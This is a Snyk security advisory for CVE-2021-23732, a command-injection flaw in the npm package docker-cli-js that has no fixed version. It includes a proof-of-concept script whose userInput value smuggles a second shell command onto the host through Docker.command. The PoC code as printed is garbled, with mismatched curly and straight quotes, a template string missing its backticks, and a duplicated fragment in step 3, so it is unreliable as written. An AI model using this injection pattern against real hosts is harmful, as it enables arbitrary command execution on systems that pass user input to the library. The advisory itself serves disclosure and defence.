CVE-2021-23732: Arbitrary Code Execution in docker-cli-js | Snyk

How to fix?

There is no fixed version for docker-cli-js.

Overview

Affected versions of this package are vulnerable to Arbitrary Code Execution. If the command parameter of the Docker.command method can at least be partially controlled by a user, they will be in a position to execute any arbitrary OS commands on the host system.

##PoC

1. Create a file named exploit.js with the following content:

   var dockerCLI = require(‘docker-cli-js’); var DockerOptions = dockerCLI.Options; var Docker = dockerCLI.Docker;

   var docker = new Docker();

   var userInput = "echo 'Hello from the container’"; echo ‘Hello from the host’ #";

   docker.command(exec container-test bash -c "${userInput}", function (err, data) { console.log('data = ', data); });

2. In the same directory as exploit.js, run npm install docker-cli-js.
3. Create a background Docker container named container-test: docker run': docker run --name container-test -d ubuntu sleep 1000.
4. Run exploit.js: node exploit.js.

You should see the outputs of both the container and host system.